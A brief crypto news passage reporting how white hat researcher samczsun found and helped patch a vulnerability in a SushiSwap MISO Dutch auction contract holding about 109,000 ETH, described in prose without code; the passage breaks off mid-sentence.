How A Whitehat Hacker Saved 109K ETH On SushiSwap-Based Contract

White hat hacker Samczsun from investment firm Paradigm reported what could be one of the biggest rescues ever on the SushiSwap protocol, the Ethereum ecosystem, and maybe the entire internet. Just pulled off maybe the biggest whitehat rescue ever. Story time soon 🔥 — samczsun (@samczsun) August 17, 2021 Samczun claimed in a post that he found and help patch a vulnerability that was threatening over $350 million or 109,000 ETH from a Sushiswap based contract from its MISO platform. The white hacker reviewed the contract after he found there was a new auction taking place on the platform. MISO uses two types of auctions Duct and batch. While Samczun was reviewing the DutchAuction contract, the white hacker found that functions InitMarket and InitAuction lacked access controls. This was “extremely concerning”. I didn’t really expect this to be a vulnerability though, since I didn’t expect the Sushi team to make such an obvious misstep. Sure enough, the initAccessControls function validated that the contract had not already been initialized. Samczun said that the above combined with the use of a mixin library called BoringBatchable by the contract made it more suspicious. The hacker recognized the ingredients that led to an attack on another platform during 2020. Thus, Samczun was able to identify that SushiSwap was in danger. If exploited, the vulnerability would allow a bad actor to reuse a fixed amount of ETH to batch m...